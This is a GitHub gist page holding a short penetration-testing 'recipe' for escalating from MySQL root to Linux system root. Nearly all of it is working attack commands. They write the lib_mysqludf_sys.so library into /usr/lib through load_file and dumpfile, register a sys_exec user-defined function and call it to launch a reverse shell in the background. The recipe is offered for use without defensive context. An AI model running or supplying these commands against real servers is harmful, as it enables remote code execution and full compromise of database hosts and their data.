Skip to content

Instantly share code, notes, and snippets.

@shaheemirza

shaheemirza/mysql_root_to_system_root

Forked from p0c/mysql_root_to_system_root
Created March 1, 2017 19:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shaheemirza/daa88b3fe8b4a883a9996215d89e35ff to your computer and use it in GitHub Desktop.
Save shaheemirza/daa88b3fe8b4a883a9996215d89e35ff to your computer and use it in GitHub Desktop.
Download ZIP
#pentest #recipe: mysql root -> system root (linux)
Raw
mysql_root_to_system_root
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment